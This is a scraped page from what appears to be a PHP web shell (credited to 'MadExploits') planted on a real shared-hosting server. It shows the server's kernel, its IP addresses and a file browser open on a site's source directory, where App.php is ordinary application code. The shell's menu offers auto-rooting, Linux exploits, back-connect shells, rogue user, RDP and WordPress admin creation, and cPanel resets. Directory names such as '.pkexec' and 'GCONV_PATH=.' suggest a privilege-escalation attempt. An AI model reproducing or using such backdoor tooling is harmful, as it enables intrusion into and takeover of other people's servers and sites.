Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.43
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
contract.tradesense.co.ke /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
commons
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
App.php
878
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : App.php
<?php session_start(); if(!isset($_SESSION['variables'])){ $_SESSION['variables']=array(); } define('BASEDIR',dirname(__FILE__)."/"); define('APP_PATH',dirname(__FILE__)); /******grab configs**********/ foreach (glob(APP_PATH."/config/*.php") as $filename) { include $filename; } /****** Redirect to installer ****/ if(!defined('DB_NAME')){ header("Location: ./install/"); } /******grab core files**********/ foreach (glob(APP_PATH."/classes/*.php") as $filename) { include $filename; } //load core functions include "helpers/core.php"; //load main functions include "helpers/Mailer.php"; //load main functions if(isset($_GET['actions'])){ include "helpers/actions.php"; //load main functions } if(isset($_GET['Download'])){ include "helpers/Download.php"; //load main functions } ?>
Close